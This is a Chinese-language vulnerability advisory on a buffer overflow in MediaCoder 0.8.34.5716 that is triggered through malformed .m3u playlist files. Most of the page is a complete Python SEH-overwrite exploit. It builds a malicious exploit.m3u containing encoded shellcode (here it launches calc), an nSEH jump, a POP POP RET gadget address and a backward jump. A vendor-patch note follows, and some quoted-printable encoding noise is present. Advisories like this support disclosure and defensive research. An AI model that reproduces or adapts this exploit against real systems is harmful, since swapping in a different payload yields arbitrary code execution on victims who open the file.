Mediacoder 0.8.34.5716版本缓冲区溢出漏洞
发表日期:2015-05-08 10:11:09
      Mediacoder 0.8.34.5716版本缓冲区溢出漏洞
     
 
     
      发布日期:2015-05-06
     
 
     
      更新日期:2015-05-07
     
 
     
      受影响系统:
     
 
     
      MediaCoder MediaCoder 0.8.34.5716
     
 
     
      详细信息:
     
 
     
      MediaCoder是一个免费的通用音频/视频批量转码工具。
     
 
     
      MediaCoder在处理畸形.m3u文件时存在缓冲区溢出漏洞,攻击者利用此漏洞可执行未授权操作。
     
 
     
      来源:
     
 
     
      vendor
     
 
     
      测试方法:
     
 
     
      警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python
     
 
     
      # Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
     
 
     
      # Date: 05/May/2015
     
 
     
      # Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
     
 
     
      # email: kwiha2003 [at ]yahoo [dot] com=20
     
 
     
      # Version: 0.8.34.5716
     
 
     
      # Tested on: Win XP3
     
 
     
      # Vendor: http://www.mediacoderhq.com/
     
 
     
      # Software link: http://www.mediacoderhq.com/getfile.htm?site=3Dmediacoder.=
     
 
     
      info&file=3DMediaCoder-0.8.34.5716.exe
     
 
     
      # Greetz: b33f,corelan,offsec,vulnhub,HUST510
     
 
     
      # Notes: Due to insifficient space after taking control of the EIP, you hav=
     
 
     
      e to jump backwards and also=20
     
 
     
      #        avoid a few bad bytes after the "A"s.
     
 
     
      #!/usr/bin/python
     
 
     
      buffersize =3D 853
     
 
     
      buffer =3D ("http://" + "\\x41" * 256)
     
 
     
      #Space for shellcode to decode
     
 
     
      buffer +=3D "\\x90" * 24
     
 
     
      # msfpayload windows/exec CMD=3Dcalc R|msfencode -b "\\x00\\x0a\\x0d\\x20" -t c=
     
 
     
       -e x86/shikata_ga_nai
     
 
     
      #[*] x86/shikata_ga_nai succeeded with size 223 (iteration=3D1)
     
 
     
      #unsigned char buf[] =3D=20
     
 
     
      buffer +=3D("\\xdd\\xc1\\xbd\\xc4\\x15\\xfd\\x3a\\xd9\\x74\\x24\\xf4\\x5f\\x29\\xc9\\xb1"
     
 
     
      "\\x32\\x31\\x6f\\x17\\x03\\x6f\\x17\\x83\\x2b\\xe9\\x1f\\xcf\\x4f\\xfa\\x69"
     
 
     
      "\\x30\\xaf\\xfb\\x09\\xb8\\x4a\\xca\\x1b\\xde\\x1f\\x7f\\xac\\x94\\x4d\\x8c"
     
 
     
      "\\x47\\xf8\\x65\\x07\\x25\\xd5\\x8a\\xa0\\x80\\x03\\xa5\\x31\\x25\\x8c\\x69"
     
 
     
      "\\xf1\\x27\\x70\\x73\\x26\\x88\\x49\\xbc\\x3b\\xc9\\x8e\\xa0\\xb4\\x9b\\x47"
     
 
     
      "\\xaf\\x67\\x0c\\xe3\\xed\\xbb\\x2d\\x23\\x7a\\x83\\x55\\x46\\xbc\\x70\\xec"
     
 
     
      "\\x49\\xec\\x29\\x7b\\x01\\x14\\x41\\x23\\xb2\\x25\\x86\\x37\\x8e\\x6c\\xa3"
     
 
     
      "\\x8c\\x64\\x6f\\x65\\xdd\\x85\\x5e\\x49\\xb2\\xbb\\x6f\\x44\\xca\\xfc\\x57"
     
 
     
      "\\xb7\\xb9\\xf6\\xa4\\x4a\\xba\\xcc\\xd7\\x90\\x4f\\xd1\\x7f\\x52\\xf7\\x31"
     
 
     
      "\\x7e\\xb7\\x6e\\xb1\\x8c\\x7c\\xe4\\x9d\\x90\\x83\\x29\\x96\\xac\\x08\\xcc"
     
 
     
      "\\x79\\x25\\x4a\\xeb\\x5d\\x6e\\x08\\x92\\xc4\\xca\\xff\\xab\\x17\\xb2\\xa0"
     
 
     
      "\\x09\\x53\\x50\\xb4\\x28\\x3e\\x3e\\x4b\\xb8\\x44\\x07\\x4b\\xc2\\x46\\x27"
     
 
     
      "\\x24\\xf3\\xcd\\xa8\\x33\\x0c\\x04\\x8d\\xcc\\x46\\x05\\xa7\\x44\\x0f\\xdf"
     
 
     
      "\\xfa\\x08\\xb0\\x35\\x38\\x35\\x33\\xbc\\xc0\\xc2\\x2b\\xb5\\xc5\\x8f\\xeb"
     
 
     
      "\\x25\\xb7\\x80\\x99\\x49\\x64\\xa0\\x8b\\x29\\xeb\\x32\\x57\\xae")
     
 
     
      buffer +=3D "\\x42" * 350
     
 
     
      nseh =3D "\\xEB\\x06\\x90\\x90"
     
 
     
      # 0x660104ee : pop edi # pop ebp # ret  | [libiconv-2.dll]=20
     
 
     
      seh=3D"\\xee\\x04\\x01\\x66"
     
 
     
      #Jump back 603 bytes due to insufficient space for shellcode
     
 
     
      jmpbck =3D "\\xe9\\xA5\\xfd\\xff\\xff"
     
 
     
      junk =3D ("D" * 55)=20
     
 
     
      f=3D open("exploit.m3u",\'w\')
     
 
     
      f.write(buffer + nseh + seh + jmpbck + junk)
     
 
     
      f.close()
     
 
     
      解决办法:
     
 
     
      厂商补丁:
     
 
     
      MediaCoder
     
 
     
      ----------
     
 
     
      目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
     
 
     

   



